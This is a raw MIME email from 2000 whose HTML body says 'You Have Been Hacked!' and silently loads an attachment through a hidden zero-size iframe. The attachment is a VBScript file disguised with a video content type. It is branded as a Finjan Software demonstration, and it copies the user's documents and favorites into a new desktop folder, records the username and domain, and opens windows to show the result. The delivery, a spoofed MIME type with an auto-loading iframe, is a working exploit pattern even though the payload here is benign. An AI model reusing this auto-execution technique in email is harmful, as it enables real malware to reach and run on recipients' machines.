From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal

--1
Content-Type: multipart/alternative;
	boundary="2"


--2
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:hello.wav height=3D0 width=3D0></iframe>
You Have Been Hacked!<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: video/x-ms-asf;
	name="Finjan_VBS_Demo.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <hello.wav>


' Copyright (c) Finjan Software=20
'************************************************************************=
*************************************************************************=
*************************************************************************=
**************************
'This demonstration shows you the danger of running script files on your =
PC.
'A new folder will be created on your Windows Desktop directory named =
'You Have Been Hacked!' and several of your files will copied to this =
folder. You may delete this folder (the files are copies only and the =
originals have not been moved).
'This demo was created by Finjan Software, the leader in First-Strike =
Security.  Finjan delivers proactive security solutions that protect =
companies and computer users from first-strike malicious code attacks =
without relying on database updates.
'************************************************************************=
*************************************************************************=
*************************************************************************=
**************************

On Error Resume Next
Dim fso, fldr, f1, F, shell, DeskPath, MyDocPath, =
RecentPath,FavoritePath, text1, text2, text3, text4, text5, text6, =
CurrentFolder, objNet=20

Set fso =3DCreateObject("Scripting.FileSystemObject")
set shell =3DCreateObject("WScript.Shell")
Set objNet =3DWScript.CreateObject( "WScript.Network" )

DeskPath =3Dshell.SpecialFolders("Desktop")
MyDocPath =3Dshell.SpecialFolders("MyDocuments")
RecentPath =3Dshell.SpecialFolders("Recent")
FavoritePath =3Dshell.SpecialFolders("Favorites")

fldr =3Dfso.CreateFolder(DeskPath & "\You Have Been Hacked!")

'copying the files
'------------------------------------------------------------------------=
-----------------------------------------------------
Set CurrentFolder =3D fso.GetFolder(fldr)
count =3D 0

If (MyDocPath) Then
	fso.CopyFile MyDocPath & "\*.doc", DeskPath & "\You Have Been Hacked!"
=09
	count=3DNumFiles(CurrentFolder)
        If (count < 5) Then
		fso.CopyFile MyDocPath & "\*.xls", DeskPath & "\You Have Been Hacked!"	=
=09

		count=3DNumFiles(CurrentFolder)
		If (count < 5) Then
			fso.CopyFile MyDocPath & "\*.ppt", DeskPath & "\You Have Been =
Hacked!"

		count=3DNumFiles(CurrentFolder)
		If (count < 5) Then
			fso.CopyFile MyDocPath & "\*.rtf", DeskPath & "\You Have Been =
Hacked!"

		If (count < 5) Then
			fso.CopyFile MyDocPath & "\*.html", DeskPath & "\You Have Been =
Hacked!"
		End If
		End If
		End If
	End If
End If


count=3DNumFiles(CurrentFolder)
If(counter < 5) Then
	If (FavoritePath) Then
		fso.CopyFile FavoritePath & "\*.com*", DeskPath & "\You Have Been =
Hacked!"

		count=3DNumFiles(CurrentFolder)
		If (FavoritePath) Then
			fso.CopyFile FavoritePath & "\*.url*", DeskPath & "\You Have Been =
Hacked!"
		End If
	End If
End If

'Creating and writing the text file
'------------------------------------------------------------------------=
---------------------------------------------------
Set f1 =3D fso.CreateTextFile( DeskPath & "\You Have Been =
Hacked!\\Finjan Software Demo.txt", True)

f1.WriteLine("Here is some sensitive information about your PC:")
f1.WriteLine("Username: " & objNet.UserName)
f1.WriteLine("Domain: " & objNet.UserDomain)
f1.WriteBlankLines(2)
f1.WriteLine("This has been a demonstration to show you the danger of =
running script files on your PC.")=20
f1.WriteBlankLines(2)
f1.WriteLine("A new folder has been created on your Windows Desktop =
directory named 'You Have Been Hacked!' and several of your files were =
copied to this folder. You may delete this folder (the files are copies =
only and the originals have not been moved).")
f1.WriteBlankLines(2)
f1.WriteLine ("This demo was created by Finjan Software, the leader in =
First-Strike Security.  Finjan delivers proactive security solutions =
that protect companies and computer users from first-strike malicious =
code attacks without relying on database updates.")
f1.WriteBlankLines(1)
f1.WriteLine("                        www.finjan.com")
f1.close()=20
'------------------------------------------------------------------------=
----------------------------------------------------

shell.Run "explorer.exe " &DeskPath &"\You Have Been Hacked!"
shell.Run "notepad.exe " &DeskPath &"\You Have Been Hacked!\Finjan =
Software Demo.txt"=20

'functions
'------------------------------------------------------------------------=
----------------------------------------------------
Function NumFiles(CurrentFolder)
	counter =3D 0
	Set i =3D CurrentFolder.Files
	For Each f2 in i
		If ((fso.GetExtensionName(f2) =3D "doc") or (fso.GetExtensionName(f2) =
=3D "ppt") or (fso.GetExtensionName(f2) =3D "xls") or =
(fso.GetExtensionName(f2) =3D "mdb") or (fso.GetExtensionName(f2) =3D =
"rtf") or (fso.GetExtensionName(f2) =3D "html") ) Then
			counter =3D counter + 1
		End if
	Next
	NumFiles =3D counter
End Function


--1